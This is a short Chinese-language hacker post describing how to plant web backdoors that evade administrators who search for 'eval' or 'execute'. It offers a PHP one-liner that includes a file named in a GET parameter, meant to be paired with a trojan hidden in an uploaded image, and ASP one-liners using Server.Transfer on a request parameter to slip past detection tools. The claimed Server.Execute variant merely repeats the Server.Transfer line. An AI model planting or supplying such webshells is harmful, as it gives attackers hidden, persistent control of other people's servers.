以前用过PHP的后门,都被查的差不多.管理员有的时候很变态,去查一些特别的比如eval等等,我上一次心爱的小马就这么挂掉了.555555.所以我就想到了Phpwind的那个文件包含漏洞.然后再一想,对呵....可以当后门嘛....于是就出来了
很多论坛是可以支持上传文件的功能的,所以有的时候我们上传一个包含木马的图片,再就是可以使用下面的代码来那个哪个.......
| 程序代码: |
| <?@include($_GET['kEvin1986']);?> | |
不规范的写法是
| 程序代码: |
| <?@include($kEvin1986);?> | |
比那些管理员没事情去查eval要好多了
而我又想到了另外一种ASP下的方法,也是简单明了,而且可以避开execute这个词
| 程序代码: |
| <%if request("kEvin1986")<>"" then Server.Transfer request("kEvin1986")%> | |
如果要用Server.Execuet的话就
| 程序代码: |
| <%if request("kEvin1986")<>"" then Server.Transfer request("kEvin1986")%> | |
恩.现在就不怕那些什么ASP追捕了....